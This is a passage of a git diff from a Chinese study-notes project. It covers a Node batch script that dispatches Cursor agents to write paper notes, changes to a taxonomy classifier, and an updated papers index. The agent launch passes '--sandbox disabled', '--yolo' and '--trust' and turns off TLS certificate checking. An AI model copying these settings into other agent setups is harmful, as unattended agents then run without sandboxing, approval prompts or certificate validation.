的零基础学习笔记,保存到 src/content/docs/${dir}/${slug}.md。 +格式:frontmatter 必须含 title、来源:${url||''}、日期:2026-06-13、分类、子分类、provenance:pipeline-v3(写完后运行 node scripts/classify-notes.mjs --apply --area=${area} 自动填入分类/子分类)。 +正文从日常类比开始,必须含核心概念+至少2个代码示例,目标150+行。 +用 web_search 研究后直接写完整笔记,不要只描述计划。`; + + const child = spawn(CURSOR_BIN, [ + '--print', '--model', MODEL, + '--workspace', ROOT, + '--trust', '--sandbox', 'disabled', '--yolo', + prompt + ], { + env: { ...process.env, NODE_TLS_REJECT_UNAUTHORIZED: '0' }, + stdio: ['ignore', 'pipe', 'pipe'], + timeout: 300000, // 5 min timeout + }); + + let stdout = ''; + child.stdout.on('data', (d) => { stdout += d.toString(); }); + child.stderr.on('data', () => {}); // ignore stderr + + child.on('close', (code) => { + resolve({ slug, area, exitCode: code, output: stdout.slice(-200) }); + }); + + child.on('error', (err) => { + resolve({ slug, area, exitCode: -1, error: err.message }); + }); + }); +} + +function updateCandidateStatus(slug, area, status) { + const candidates = readJsonl(CANDIDATES_PATH); + let updated = false; + for (const c of candidates) { + if (c.slug === slug && c.area === area && c.status === 'queued') { + c.status = status; + c.written_at = new Date().toISOString(); + updated = true; + } + } + if (updated) { + writeJsonl(CANDIDATES_PATH, candidates); + } + return updated; +} + +function verifyQuality(slug, area) { + const dir = area === 'papers' ? PAPERS_DIR : PROJECTS_DIR; + const fpath = path.join(dir, `${slug}.md`); + if (!fs.existsSync(fpath)) return { ok: false, reason: 'file not created' }; + + const content = fs.readFileSync(fpath, 'utf8'); + const lines = content.split('\n').length; + + if (lines < 100) return { ok: false, reason: `too short: ${lines} lines` }; + if (!content.includes('---')) return { ok: false, reason: 'no frontmatter' }; + if (!content.includes('来源')) return { ok: false, reason: 'no source field' }; + if (!/^分类:\s*.+$/m.test(content)) return { ok: false, reason: 'missing 分类' }; + + return { ok: true, lines }; +} + +function applyClassification(area) { + try { + execSync(`node scripts/classify-notes.mjs --apply --area=${area}`, { cwd: ROOT, stdio: 'pipe' }); + return true; + } catch { + return false; + } +} + +async function runBatch(batchNum, totalBatches) { + console.log(`\n=== Batch ${batchNum}/${totalBatches} ===`); + + const items = pickBatch(); + if (items.length === 0) { + console.log(' No candidates available.'); + return { new: 0, skipped: 0, failed: 0, done: true }; + } + + // Filter: skip already-existing files AND already-claimed slugs + const toWrite = []; + const skipped = []; + for (const item of items) { + if (fileExists(item.slug, item.area)) { + const dir = item.area === 'papers' ? PAPERS_DIR : PROJECTS_DIR; + const content = fs.readFileSync(path.join(dir, `${item.slug}.md`), 'utf8'); + if (!/^分类:\s*.+$/m.test(content)) { + applyClassification(item.area); + } + skipped.push(item.slug); + updateCandidateStatus(item.slug, item.area, 'written'); + } else if (!claimSlug(item.slug)) { + skipped.push(item.slug + '(claimed)'); + } else { + toWrite.push(item); + } + } + if (skipped.length > 0) console.log(` Skipped (already exist): ${skipped.join(', ')}`); + if (toWrite.length === 0) { + console.log(' All candidates already exist.'); + return { new: 0, skipped: skipped.length, failed: 0, done: false }; + } + + console.log(` Dispatching ${toWrite.length} cursor-agents...`); + + // Parallel dispatch + const promises = toWrite.map(item => + dispatchCursorAgent(item.slug, item.area, item.title || item.slug, item.url || '') + ); + const results = await Promise.all(promises); + + let newCount = 0; + let failCount = 0; + for (const r of results) { + applyClassification(r.area); + const q = verifyQuality(r.slug, r.area); + if (q.ok) { + updateCandidateStatus(r.slug, r.area, 'written'); + console.log(` OK: ${r.slug} (${q.lines} lines)`); + newCount++; + } else { + console.log(` FAIL: ${r.slug} — ${q.reason}`); + failCount++; + } + releaseClaim(r.slug); + } + + return { new: newCount, skipped: skipped.length, failed: failCount, done: false }; +} + +async function main() { + console.log(`Cursor Batch Loop: ${BATCHES} batches x ${COUNT}/batch`); + let totalNew = 0, totalSkipped = 0, totalFailed = 0; + + for (let b = 1; b <= BATCHES; b++) { + const result = await runBatch(b, BATCHES); + totalNew += result.new; + totalSkipped += result.skipped; + totalFailed += result.failed; + + if (result.done) { + console.log('\nCandidate pool exhausted.'); + break; + } + + // Small delay between batches + if (b < BATCHES) await new Promise(r => setTimeout(r, 2000)); + } + + // Final stats + const allProjects = fs.readdirSync(PROJECTS_DIR).filter(f => f.endsWith('.md')).length; + const allPapers = fs.readdirSync(PAPERS_DIR).filter(f => f.endsWith('.md')).length; + console.log(`\n=== Complete ===`); + console.log(`New: ${totalNew} | Skipped: ${totalSkipped} | Failed: ${totalFailed}`); + console.log(`Total notes: ${allProjects + allPapers} (projects: ${allProjects}, papers: ${allPapers})`); +} + +main().catch(err => { + console.error('Batch loop crashed:', err); + process.exit(1); +}); diff --git a/scripts/pick-batch.mjs b/scripts/pick-batch.mjs index ecfa0d668..d59557b7f 100644 --- a/scripts/pick-batch.mjs +++ b/scripts/pick-batch.mjs @@ -45,7 +45,7 @@ function parseArgs() { async function readJsonl(p) { try { const raw = await fs.readFile(p, 'utf8'); - return raw.split('\n').filter(Boolean).map(l => JSON.parse(l)); + return raw.split('\n').filter(Boolean).map(l => { try { return JSON.parse(l); } catch { return null; } }).filter(Boolean); } catch (err) { if (err.code === 'ENOENT') return []; throw err; diff --git a/scripts/taxonomy-lib.mjs b/scripts/taxonomy-lib.mjs index 19fff397f..ae1db5619 100644 --- a/scripts/taxonomy-lib.mjs +++ b/scripts/taxonomy-lib.mjs @@ -12,13 +12,14 @@ export const TAXONOMY_PATH = path.join(ROOT, 'data/taxonomy.json'); let _cached = null; export async function loadTaxonomy() { - if (_cached) return _cached; + if (_cached?.themeById) return _cached; const raw = await fs.readFile(TAXONOMY_PATH, 'utf8'); - _cached = JSON.parse(raw); - const themeById = new Map(_cached.themes.map((t) => [t.id, t])); - const themeByLabel = new Map(_cached.themes.map((t) => [t.label, t])); - const themeOrder = new Map(_cached.themes.map((t) => [t.label, t.order])); - return { ..._cached, themeById, themeByLabel, themeOrder }; + const parsed = JSON.parse(raw); + const themeById = new Map(parsed.themes.map((t) => [t.id, t])); + const themeByLabel = new Map(parsed.themes.map((t) => [t.label, t])); + const themeOrder = new Map(parsed.themes.map((t) => [t.label, t.order])); + _cached = { ...parsed, themeById, themeByLabel, themeOrder }; + return _cached; } export function parseFrontmatter(raw) { @@ -167,6 +168,10 @@ function inferThemeFromSlug(taxonomy, slug, area) { [/^(react|vue|svelte|next-|nuxt|vite|webpack|esbuild)/, 'backend-api'], [/^(kubernetes|docker|k8s|helm|terraform|prometheus|grafana)/, 'infrastructure'], [/^(tcp|quic|tls|http|dns|bbr)/, 'network-protocols'], + [ + /^(hkdf|hmac|aes-|gcm-|rsa|oauth|zk-|snark|regev|dilithium|sgx|trustzone|spectre|meltdown|rowhammer|ckks|pbkdf|argon|noise-protocol|dwork-|abadi-dpsgd|kdf-|key-deriv|log4shell)/, + 'security-privacy', + ], [/^(bert|gpt|llama|transformer|attention|clip|diffusion|lstm)/, 'machine-learning'], [/^(bitcoin|ethereum|solidity|zk-)/, 'blockchain'], [/^(llvm|wasm|v8|compiler|parser)/, 'compilers'], @@ -178,6 +183,41 @@ function inferThemeFromSlug(taxonomy, slug, area) { return null; } +/** + * Score one note for classification (SDK / pipeline consumer). + * Wraps classifySlug with a stable { theme, score, needsReview } shape. + * + * @param {{ slug: string, area: 'papers'|'projects', fm?: Record, candidate?: object|null, title?: string, tags?: string[], snippet?: string }} item + * @returns {Promise<{ theme: string, score: number, needsReview: boolean, themeId: string, subcategory: string }>} + */ +export async function scoreItem(item) { + const taxonomy = await loadTaxonomy(); + const fm = { ...(item.fm ?? {}) }; + if (item.title && !fm.title) fm.title = item.title; + if (item.tags?.length && !fm.tags) fm.tags = item.tags.join(', '); + const snippet = item.snippet ?? ''; + if (snippet && !fm['分类']) { + // Body keywords can reinforce security/crypto notes when slug is ambiguous. + if (/hkdf|hmac|key derivation|kdf|密钥派生/i.test(snippet)) { + fm['分类'] = fm['分类'] || '安全与隐私'; + } + } + const c = classifySlug(taxonomy, { + slug: item.slug, + area: item.area, + fm, + candidate: item.candidate ?? null, + }); + const score = c.themeId === 'other' ? 0 : c.confidence === 'high' ? 80 : 45; + return { + theme: c.theme, + themeId: c.themeId, + subcategory: c.subcategory, + score, + needsReview: c.confidence === 'low' || c.themeId === 'other', + }; +} + export async function loadCandidates() { const p = path.join(ROOT, 'data/candidates.jsonl'); const map = new Map(); diff --git a/src/content/docs/papers-atlas.md b/src/content/docs/papers-atlas.md index 1b50c73c3..82e2ba769 100644 --- a/src/content/docs/papers-atlas.md +++ b/src/content/docs/papers-atlas.md @@ -1,6 +1,6 @@ --- title: 论文全景索引 -description: 948 篇论文 · 按一级主题与子分类 · 自动从 frontmatter 生成 +description: 1033 篇论文 · 按一级主题与子分类 · 自动从 frontmatter 生成 sidebar: order: 5 label: 论文全景索引 @@ -11,38 +11,38 @@ sidebar: ## 总览 -- **总数**:948 篇 -- **已分类**:948 +- **总数**:1033 篇 +- **已分类**:1033 ### 按一级主题分布 | 主题 | 数量 | |---|---:| -| [编程语言](#编程语言) | 109 | -| [分布式系统](#分布式系统) | 75 | -| [数据库](#数据库) | 67 | -| [操作系统](#操作系统) | 63 | -| [机器学习](#机器学习) | 215 | -| [后端 API](#后端-api) | 9 | +| [编程语言](#编程语言) | 112 | +| [分布式系统](#分布式系统) | 78 | +| [数据库](#数据库) | 80 | +| [操作系统](#操作系统) | 65 | +| [机器学习](#机器学习) | 257 | +| [后端 API](#后端-api) | 10 | | [基础设施](#基础设施) | 12 | | [网络协议](#网络协议) | 66 | | [图形学](#图形学) | 122 | -| [形式化方法](#形式化方法) | 51 | +| [形式化方法](#形式化方法) | 54 | | [通信](#通信) | 1 | | [信息检索](#信息检索) | 52 | | [Agent](#agent) | 22 | -| [CLI](#cli) | 1 | +| [CLI](#cli) | 5 | | [NLP](#nlp) | 9 | | [编译器](#编译器) | 3 | | [数据可视化](#数据可视化) | 4 | -| [安全与隐私](#安全与隐私) | 54 | +| [安全与隐私](#安全与隐私) | 68 | | [其他](#其他) | 13 | --- ## 编程语言 -共 109 篇。 +共 112 篇。 ### 编程语言 @@ -82,18 +82,21 @@ sidebar: | [Agda — 让你写代码的同时把数学也证明了](/study/papers/agda-norell/) | ✅ v3 | | | [Andersen 指针分析 — 让编译器自己算出 p 可能指向谁](/study/papers/andersen-pointer-analysis/) | ✅ v3 | | | [ASTRÉE 分析器 — 让飞机控制代码的静态分析做到零警告](/study/papers/astree/) | ✅ v3 | | +| [Bijou64 — 结构式规范化的变长整数编码](/study/papers/bijou64-varint/) | ✅ v3 | | | [CakeML — 从源码到机器码每一步都被数学证明的 ML 编译器](/study/papers/cakeml/) | ✅ v3 | | | [Calculus of Constructions — 让程序和数学证明共用一种语言](/study/papers/calculus-of-constructions/) | ✅ v3 | | | [Call-by-Need Lambda Calculus — 给惰性求值一套真正的演算](/study/papers/call-by-need-1995/) | ✅ v3 | | | [Chaitin 图染色寄存器分配 — 把硬件资源问题翻译成数学问题](/study/papers/chaitin-graph-coloring/) | ✅ v3 | | | [Coeffects — 让类型系统追踪「需要多少上下文」](/study/papers/coeffect-petricek/) | ✅ v3 | | | [CompCert — 每条优化都被数学证明保持语义的 C 编译器](/study/papers/compcert/) | ✅ v3 | | +| [Performance Left on the Table — 编译器自动向量化还剩多少性能没吃到](/study/papers/compiler-perf-left-on-table/) | ✅ v3 | | | [Cousot 抽象解释 — 给静态分析一套统一数学框架](/study/papers/cousot-abstract-interpretation/) | ✅ v3 | | | [CSP — 进程之间只许喊话不许共用内存](/study/papers/csp-hoare-1978/) | ✅ v3 | | | [DDlog (Differential Datalog) — 输入只改一条,引擎只算受影响的那一小块](/study/papers/differential-datalog/) | ✅ v3 | | | [Doligez-Leroy GC — OCaml 多线程并发垃圾回收](/study/papers/doligez-leroy-concurrent-gc/) | ✅ v3 | | | [Earley Parser — 一个表能解析任何 CFG 的通用解析器](/study/papers/earley-parser/) | ✅ v3 | | | [Feautrier 多面体调度 — 把循环并行化变成解几何方程](/study/papers/feautrier-polyhedral/) | ✅ v3 | | +| [First-Class Refinement Types for Scala — 把「带条件的类型」写进 Scala 3 本身](/study/papers/first-class-refinement-scala/) | ✅ v3 | | | [Frank — 让 effect handler 写得就像普通函数](/study/papers/frank-effects/) | ✅ v3 | | | [F* — 把依赖类型、SMT 自动化、副作用追踪揉到一门语言里](/study/papers/fstar/) | ✅ v3 | | | [G1 Garbage-First — 给暂停时间设个预算的垃圾回收器](/study/papers/g1-collector/) | ✅ v3 | | @@ -175,7 +178,7 @@ sidebar: ## 分布式系统 -共 75 篇。 +共 78 篇。 ### 分布式系统 @@ -212,6 +215,7 @@ sidebar: | [Drizzle — 让 micro-batch 也能跑出 100ms 延迟](/study/papers/drizzle-2017/) | ✅ v3 | | | [EPaxos — 没有 leader 的 Paxos,让每个副本平起平坐](/study/papers/epaxos-2013/) | ✅ v3 | | | [f4 — Facebook 把 90 天前的旧图片搬到一个省 40% 存储的仓库](/study/papers/f4-2014/) | ✅ v3 | | +| [FaRM — 用 RDMA 把集群内存变成一块「共享白板」](/study/papers/farm-2015/) | ✅ v3 | | | [Fast Paxos — 给 Paxos 加一条乐观快车道](/study/papers/fast-paxos-2006/) | ✅ v3 | | | [Fidge 1988 — 给每个进程一份"账本向量",让因果关系变成可判定](/study/papers/fidge-1988/) | ✅ v3 | | | [Flexible Paxos — 两阶段不一定都要多数派](/study/papers/flexible-paxos-2016/) | ✅ v3 | | @@ -233,6 +237,7 @@ sidebar: | [Naiad — 一套引擎同时跑批处理、流处理和迭代计算](/study/papers/naiad-2013/) | ✅ v3 | | | [Narwhal & Tusk — 把 BFT 共识拆成『谁说过』和『谁先说』两件事](/study/papers/narwhal-tusk-2022/) | ✅ v3 | | | [NTP 1991 — 用四个时间戳和一组滤波器,让全网服务器的钟差几毫秒](/study/papers/ntp-mills-1991/) | ✅ v3 | | +| [On-demand Container Loading — Lambda 如何在 10GiB 镜像下保持冷启动](/study/papers/on-demand-container-loading/) | ✅ v3 | | | [OT — 多人同时改一份文档,操作随上下文自动改坐标](/study/papers/ot-1989/) | ✅ v3 | | | [PBFT — 让拜占庭容错从理论变成能跑的工程](/study/papers/pbft-1999/) | ✅ v3 | | | [Percolator 2010 — 给 Bigtable 加分布式事务的客户端库](/study/papers/percolator-2010/) | ✅ v3 | | @@ -241,6 +246,7 @@ sidebar: | [Presumed Abort/Commit — 让 2PC 少写日志少发消息的两个默认共识](/study/papers/presumed-abort-1986/) | ✅ v3 | | | [Parameter Server — 多机训练前 AllReduce 时代的工业标准](/study/papers/ps-li-2014/) | ✅ v3 | | | [Quincy — 把"派活给机器"变成一道最小费用流题](/study/papers/quincy-2009/) | ✅ v3 | | +| [Ray — 面向新兴 AI 应用的分布式框架](/study/papers/ray-2018/) | ✅ v3 | | | [Sagas — 长事务拆成一串能"反向走回去"的小事务](/study/papers/saga-1987/) | ✅ v3 | | | [Sequential Consistency 1979 — 多处理器内存模型的第一个正确性标准](/study/papers/sequential-consistency-1979/) | ✅ v3 | | | [Sinfonia 2007 — 把分布式协议降级成数据结构操作](/study/papers/sinfonia-2007/) | ✅ v3 | | @@ -269,7 +275,7 @@ sidebar: ## 数据库 -共 67 篇。 +共 80 篇。 ### 存储与查询 @@ -283,6 +289,7 @@ sidebar: | [Bernstein 1981 并发控制综述 — 把分布式数据库的 20+ 算法整成两条主线](/study/papers/bernstein-1981-cc/) | ✅ v3 | | | [Bigtable 2006 — Google 把行级随机读写做到 PB 级的存储系统](/study/papers/bigtable-2006/) | 🗄 存量 | | | [Brewer CAP — 网络一断电,一致性和可用性只能留一个](/study/papers/brewer-cap-2000/) | ✅ v3 | | +| [Bw-Tree — 面向新硬件的无锁 B 树索引](/study/papers/bw-tree/) | ✅ v3 | | | [Calvin 2012 — 先排好顺序再执行,让跨分区事务不再走 2PC](/study/papers/calvin-2012/) | ✅ v3 | | | [Cascades 1995 — 用规则 + Memo 拼装一个可扩展查询优化器](/study/papers/cascades-1995/) | ✅ v3 | | | [Cassandra 2010 — 把 Dynamo 的 P2P 骨架和 Bigtable 的列族数据模型拼成一个东西](/study/papers/cassandra-2010/) | ✅ v3 | | @@ -291,31 +298,39 @@ sidebar: | [CockroachDB 2020 — 没原子钟也能做全球强一致 SQL 数据库](/study/papers/cockroachdb-2020/) | ✅ v3 | | | [Codd 1970 — 关系模型奠基](/study/papers/codd-1970/) | ✅ v3 | | | [Codd 1979 — 给关系模型补上"语义"](/study/papers/codd-1979-extending/) | ✅ v3 | | +| [列式存储格式实证评估 — Parquet 与 ORC 谁更适合 2020 年代?](/study/papers/columnar-storage-formats-2023/) | ✅ v3 | | | [Comer 1979 — B-Tree 综述:为什么这棵树到处都有](/study/papers/comer-1979-btree/) | ✅ v3 | | | [C-Store — 把数据按列存,分析查询直接快十倍](/study/papers/cstore-2005/) | ✅ v3 | | | [Dataflow Model — 流处理的四问框架](/study/papers/dataflow-model-2015/) | ✅ v3 | | | [DeWitt-Gray 1992 — 并行数据库取代专用机的宣言](/study/papers/dewitt-gray-1992/) | ✅ v3 | | | [DiskANN — 单机十亿向量近邻检索(图存 SSD)](/study/papers/diskann-2019/) | ✅ v3 | | +| [Dremel 十年回顾 — Web 规模交互式 SQL 分析如何演化为 BigQuery](/study/papers/dremel-decade-2020/) | ✅ v3 | | | [D-Streams — 把流处理伪装成一串很小的批](/study/papers/dstreams-2013/) | ✅ v3 | | | [DuckDB — 把 OLAP 数据库塞进你的 Python 进程](/study/papers/duckdb-2019/) | ✅ v3 | | +| [Efficiently Compiling Efficient Query Plans for Modern Hardware — 面向现代 CPU 的查询编译](/study/papers/efficient-compile-2011/) | ✅ v3 | | | [Eswaran 1976 — 串行化与谓词锁的源头](/study/papers/eswaran-1976/) | ✅ v3 | | | [F1 2013 — 把 Spanner 包成 SQL,扛起 AdWords 全部账单](/study/papers/f1-2013/) | ✅ v3 | | | [FAISS 2017 — 用 GPU 在十亿向量里找最近邻](/study/papers/faiss-2017/) | ✅ v3 | | +| [FastLanes 压缩布局 — 用标量代码每秒解码超过 1000 亿整数](/study/papers/fastlanes-compression/) | ✅ v3 | | | [Apache Flink — 流批一体的单引擎](/study/papers/flink-2015/) | ✅ v3 | | | [FoundationDB 2021 — 把数据库拆成五个角色,再用一个 seed 烧十年 bug](/study/papers/foundationdb-2021/) | ✅ v3 | | | [Gray 1981 — 把"事务"提升为通用抽象](/study/papers/gray-1981-transaction/) | ✅ v3 | | | [Haystack — Facebook 十亿张照片怎么存](/study/papers/haystack-2010/) | ✅ v3 | | | [HDFS — 把 GFS 用 Java 重写一遍并撑到 25 PB](/study/papers/hdfs-2010/) | ✅ v3 | | +| [Hekaton — SQL Server 内存优化 OLTP 引擎](/study/papers/hekaton/) | ✅ v3 | | | [HNSW — 多层近邻图让向量检索从 O(N) 降到近似 O(log N)](/study/papers/hnsw-2018/) | ✅ v3 | | | [INGRES 1976 — Berkeley 平行实现的关系数据库](/study/papers/ingres-1976/) | ✅ v3 | | | [Kafka NetDB 2011 — 把消息中间件砍成"会写文件的水管"](/study/papers/kafka-2011/) | ✅ v3 | | +| [Lakehouse — 用开放格式统一数据仓库与高级分析](/study/papers/lakehouse-2021/) | ✅ v3 | | | [Leis 2015 — 用真实数据打脸所有数据库的查询优化器](/study/papers/leis-2015-optimizers/) | ✅ v3 | | | [LMDB 2011 — 把数据库直接 mmap 进内存的嵌入式 KV 存储](/study/papers/lmdb-2011/) | ✅ v3 | | | [LSM-Tree 1996 — 写优化存储引擎](/study/papers/lsm-tree-1996/) | ✅ v3 | | | [MillWheel 2013 — Google 给互联网级流处理装上不漏不重的发动机](/study/papers/millwheel-2013/) | ✅ v3 | | | [Milvus — 为向量检索而生的数据库](/study/papers/milvus-2021/) | ✅ v3 | | | [MonetDB/X100 — 让数据库一次处理一向量行而不是一行](/study/papers/monetdb-x100-2005/) | ✅ v3 | | +| [Morsel-Driven Parallelism — 面向 NUMA 的查询并行执行框架](/study/papers/morsel-driven-2014/) | ✅ v3 | | | [Adaptive Optimization of Very Large Join Queries — 100 张表也敢精确求解](/study/papers/neumann-2015-large-joins/) | ✅ v3 | | +| [OLTP Through the Looking Glass — 传统数据库的 20 倍开销从哪来](/study/papers/oltp-looking-glass/) | ✅ v3 | | | [Paxos 1998 — 古希腊议会寓言里藏的共识协议](/study/papers/paxos-1998/) | 🗄 存量 | | | [Paxos Made Simple — Lamport 用平直英语把共识协议推导一遍](/study/papers/paxos-simple-2001/) | ✅ v3 | | | [Product Quantization — 把向量切碎再压成几个字节](/study/papers/product-quantization-2011/) | ✅ v3 | | @@ -328,13 +343,17 @@ sidebar: | [Snowflake 2016 — 把数仓拆成 storage / compute / services 三层](/study/papers/snowflake-2016/) | ✅ v3 | | | [Spanner 2012 — 用原子钟和 GPS 给全球数据库发时间戳](/study/papers/spanner-2012/) | ✅ v3 | | | [SQLite — 嵌入式数据库 30 年怎么活下来的](/study/papers/sqlite-2022/) | ✅ v3 | | +| [SQLite is All You Need for Durable Workflows — 用单文件数据库做持久化工作流](/study/papers/sqlite-durable-workflows/) | ✅ v3 | | | [Stonebraker 2010 SQL vs NoSQL — 慢的是老实现,不是 SQL](/study/papers/stonebraker-2010-sqlnosql/) | ✅ v3 | | | [System R 1976 — 第一个跑起来的关系数据库](/study/papers/system-r-1976/) | ✅ v3 | | | [Tachyon — 把集群存储推到内存速度,丢了再算回来](/study/papers/tachyon-2014/) | ✅ v3 | | | [TiDB 2020 — 给 Raft 加一个"旁听生",让一份数据同时跑事务和分析](/study/papers/tidb-2020/) | ✅ v3 | | | [Trill — 一个引擎同时跑流、批、交互三种分析](/study/papers/trill-2014/) | ✅ v3 | | +| [Velox — Meta 的统一执行引擎](/study/papers/velox-meta-2022/) | ✅ v3 | | | [Vertica 2012 — C-Store 论文走向产品的七年改造账](/study/papers/vertica-2012/) | ✅ v3 | | | [Volcano 1994 — 把 SQL 执行写成 next() 拉式数据流](/study/papers/volcano-1994/) | ✅ v3 | | +| [Adopting Worst-Case Optimal Joins in Relational Database Systems — 把 WCO Join 搬进通用 RDBMS](/study/papers/wco-joins-relational-2020/) | ✅ v3 | | +| [WiscKey — 把 Key 和 Value 拆开,让 SSD 上的 LSM 树少干冤枉活](/study/papers/wisckey/) | ✅ v3 | | | [Zab — ZooKeeper 怎么把客户端写入按顺序复制到所有副本](/study/papers/zab-2011/) | ✅ v3 | | ### 数据库 @@ -355,7 +374,7 @@ sidebar: ## 操作系统 -共 63 篇。 +共 65 篇。 ### 内核与虚拟化 @@ -395,6 +414,7 @@ sidebar: | [LOCUS 1980 — 让一群机器看起来像同一台机器](/study/papers/locus-1980/) | ✅ v3 | | | [彩票调度 — 用抽奖代替优先级的资源分配](/study/papers/lottery-1994/) | ✅ v3 | | | [Mach — 把内核拆成消息互通的小服务](/study/papers/mach-1986/) | ✅ v3 | | +| [Mach 1986 — 给 UNIX 换一块能跨机器生长的内核地基](/study/papers/mach-rashid-1986/) | ✅ v3 | | | [Mach VM — 把虚拟内存抽象成"对象",与硬件解耦](/study/papers/mach-vm-1987/) | ✅ v3 | | | [MCS 锁 — 让每个线程自旋在自己的缓存行上](/study/papers/mcs-locks-1991/) | ✅ v3 | | | [Mesos 2011 — 把数据中心切成资源 offer 发给框架自己挑](/study/papers/mesos-2011/) | ✅ v3 | | @@ -429,10 +449,11 @@ sidebar: | [Boehm-Weiser 保守式垃圾回收 — 不改编译器也能给 C 加 GC](/study/papers/boehm-gc/) | ✅ v3 | | | [eBPF — 用户写小程序,内核证明安全后再跑](/study/papers/ebpf/) | ✅ v3 | | | [io_uring — Linux 让 N 次 IO 摊销到 1 次 syscall](/study/papers/io-uring/) | ✅ v3 | | +| [You probably don't need Yocto, and that's fine — 嵌入式 Linux 不必默认上 Yocto](/study/papers/yocto-alternatives/) | ✅ v3 | | ## 机器学习 -共 215 篇。 +共 257 篇。 ### 多模态 LLM @@ -465,19 +486,24 @@ sidebar: | [BIG-bench — 204 道题给大模型出考卷](/study/papers/bigbench-2022/) | ✅ v3 | | | [BigGAN — 把 GAN 暴力放大到 ImageNet 512×512](/study/papers/biggan-2018/) | ✅ v3 | | | [BLIP-2 — 用 188M 小桥接器把冻结的视觉模型和大语言模型拼起来](/study/papers/blip2-2023/) | ✅ v3 | | +| [Cross-Component Interference in LLM Agent Scaffolding(LLM Agent 脚手架的跨组件干扰)](/study/papers/cci-agent-scaffolding/) | ✅ v3 | | +| [CCOPD — 多轮语言模型的规范上下文在线策略蒸馏](/study/papers/ccopd-distillation/) | ✅ v3 | | | [Chatbot Arena — 让真人盲投,给 LLM 排出公允座次](/study/papers/chatbot-arena-2024/) | ✅ v3 | | | [Chronos — 把时间序列当语言来训练大模型](/study/papers/chronos-2024/) | ✅ v3 | | | [Classifier-Free Guidance — 让扩散模型自己听懂条件](/study/papers/classifier-free-guidance-2022/) | ✅ v3 | | | [CoCa — 把对比和生成两种多模态训练目标合到一个模型里](/study/papers/coca-2022/) | ✅ v3 | | | [Code Llama — 开源代码模型的完整训练配方](/study/papers/codellama-2023/) | ✅ v3 | | | [Codex — 让 GPT 学会写 Python,并造一把尺子量它](/study/papers/codex-2021/) | ✅ v3 | | +| [Locally Coherent, Globally Incoherent — 多组件 LLM Agent 的组合不一致性](/study/papers/compositional-incoherence/) | ✅ v3 | | | [Consistency Models — 把 50 步扩散压成 1 步出图](/study/papers/consistency-models-2023/) | ✅ v3 | | +| [When Context Hurts — 知识迁移在多智能体设计中的交叉效应](/study/papers/crossover-context-multi-agent/) | ✅ v3 | | | [DDIM — 把扩散模型 1000 步采样压到 50 步](/study/papers/ddim-2020/) | ✅ v3 | | | [AI safety via debate — 让两个 AI 互辩,人类只当评委](/study/papers/debate-2018/) | ✅ v3 | | | [DeBERTa — 把"内容"和"位置"拆成两路独立看的 BERT](/study/papers/deberta-2021/) | ✅ v3 | | | [Decision Transformer — 把强化学习当成"文字接龙"](/study/papers/decision-transformer-2021/) | ✅ v3 | | | [DeepSeek-Coder — 按整个仓库喂代码的开源 SOTA](/study/papers/deepseek-coder-2024/) | ✅ v3 | | | [DeepSeek R1 — 强化学习推理模型](/study/papers/deepseek-r1/) | ✅ v3 | | +| [Demystifying Data Organization for Enhanced LLM Training — 用「排课表」而不是「删题目」提升大模型训练](/study/papers/demystifying-data-org/) | ✅ v3 | | | [Double Descent — 模型越大越准,过参数化时代的反常识曲线](/study/papers/double-descent-2019/) | ✅ v3 | | | [DreamFusion — 用 2D 扩散模型当老师,把 NeRF 教成 3D](/study/papers/dreamfusion-2022/) | ✅ v3 | | | [Dropout — 训练时随机关掉一半神经元,反而学得更好](/study/papers/dropout-2014/) | ✅ v3 | | @@ -496,32 +522,48 @@ sidebar: | [GraphSAGE 2017 — 给没见过的节点也能算嵌入](/study/papers/graphsage-2017/) | ✅ v3 | | | [Grokking — 训练 loss 早归零,几千步后才突然学会](/study/papers/grokking-2022/) | ✅ v3 | | | [GRU 2014 — 用两个门替代 LSTM 三个门,编码-解码范式登场](/study/papers/gru-2014/) | ✅ v3 | | +| [HexAGenT — 面向 Agentic LLM 的工作流与异构感知调度](/study/papers/hexagent-agentic-scheduling/) | ✅ v3 | | +| [HullFT — 用凸包重建与梯度缓存做高效测试时微调](/study/papers/hullft-ttft/) | ✅ v3 | | | [Imagen — 文生图真正的引擎是语言模型](/study/papers/imagen-2022/) | ✅ v3 | | | [Instant-NGP — 秒级训练 NeRF 的多分辨率哈希编码](/study/papers/instant-ngp-2022/) | ✅ v3 | | | [InternVL — 6B 视觉基座 + QLLaMA 对齐开源多模态](/study/papers/internvl-2023/) | ✅ v3 | | +| [KV-Fold — 一步 KV 缓存递推实现长上下文推理](/study/papers/kv-fold/) | ✅ v3 | | | [Label Smoothing — 别让模型对正确答案过度自信](/study/papers/label-smoothing-2016/) | ✅ v3 | | | [Layer Normalization — 把归一化方向从 batch 转到 feature,让 RNN/Transformer 也能稳定训](/study/papers/layernorm-2016/) | ✅ v3 | | +| [LFM2.5-8B-A1B — 38T 预训练的边缘 MoE 个人助手](/study/papers/lfm2-5-8b-a1b-moe/) | ✅ v3 | | | [Lion — 让程序自己搜出来的优化器,比 AdamW 内存少一半](/study/papers/lion-2023/) | ✅ v3 | | +| [LLM Serving Needs Mathematical Optimization, Not Just Heuristics — 零基础学习笔记](/study/papers/llm-serving-needs-math/) | ✅ v3 | | +| [LLMSurgeon — 从生成文本反推大模型预训练数据配比](/study/papers/llmsurgeon-data-mixture/) | ✅ v3 | | | [Longformer — 滑窗加少数全局 token,把长文档喂进 Transformer](/study/papers/longformer-2020/) | ✅ v3 | | +| [Loong — 类人长文档翻译 Agent 与自适应上下文选择](/study/papers/loong-doc-mt/) | ✅ v3 | | | [彩票假设 — 大网里藏着一张能独立训出来的小网](/study/papers/lottery-ticket-2019/) | ✅ v3 | | | [LSTM — 用门控让神经网络记得住上一段话](/study/papers/lstm-1997/) | ✅ v3 | | | [Magic3D — 把 DreamFusion 的 NeRF 拆成"先粗后精"两阶段](/study/papers/magic3d-2023/) | ✅ v3 | | | [MAML — 学一个"好起点",几步就能学会新任务](/study/papers/maml-2017/) | ✅ v3 | | +| [How LoRA Remembers? — 参数记忆定律与 MemFT 零基础学习笔记](/study/papers/mem-ft-lora/) | ✅ v3 | | +| [When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?](/study/papers/memory-tool-use-agents/) | ✅ v3 | | | [Mesa-Optimization 2019 — 训出来的模型自己也是个优化器](/study/papers/mesa-optimization-2019/) | ✅ v3 | | | [MiniCPM-V — 手机能跑的 GPT-4V 级多模态模型](/study/papers/minicpm-v-2024/) | ✅ v3 | | +| [MIRA — 中期训练中的来源感知 Rubric 锚定数据筛选](/study/papers/mira-rubric/) | ✅ v3 | | | [mixup — 